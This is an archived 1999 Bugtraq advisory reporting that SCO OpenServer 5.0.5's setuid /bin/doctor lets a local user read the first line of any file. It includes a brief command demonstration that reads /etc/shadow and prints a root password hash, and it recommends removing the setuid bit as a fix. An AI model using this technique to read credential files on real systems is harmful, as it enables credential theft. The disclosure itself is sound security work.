Bugtraq mailing list archives
SCO OpenServer 5.0.5 /bin/doctor root compromise
From: btellier () WEBLEY COM (Brock Tellier)
Date: Tue, 7 Sep 1999 10:44:42 -0500
Greetings, INFO: There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example: scobox:/bin$ id uid=136(btellier),200(users) scobox:/bin$ uname -a SCO_SV scobox 3.2 5.0.5 i386 scobox:/bin$ doctor -V doctor 2.0.0e 2 scobox:/bin$ doctor -s /etc/shadow doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::" scobox:/bin$ And so on. FIX: Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within. Brock Tellier Systems Administrator Webley Systems <!-- body="end" --> <HR> <UL> <LI><STRONG>Next message:</STRONG> Zo0mer: "local telnetd DoS" <LI><STRONG>Previous message:</STRONG> Bill Royds: "Re: I found this today and iam reporting it to you first!!! (fwd)" </UL> <HR> <SMALL> This archive was generated by hypermail 2.0b3 on Thu Sep 09 1999 - 23:40:11 CDT</EM> </EM> </SMALL> </BODY> </HTML>
Current thread:
- SCO OpenServer 5.0.5 /bin/doctor root compromise Brock Tellier (Sep 07)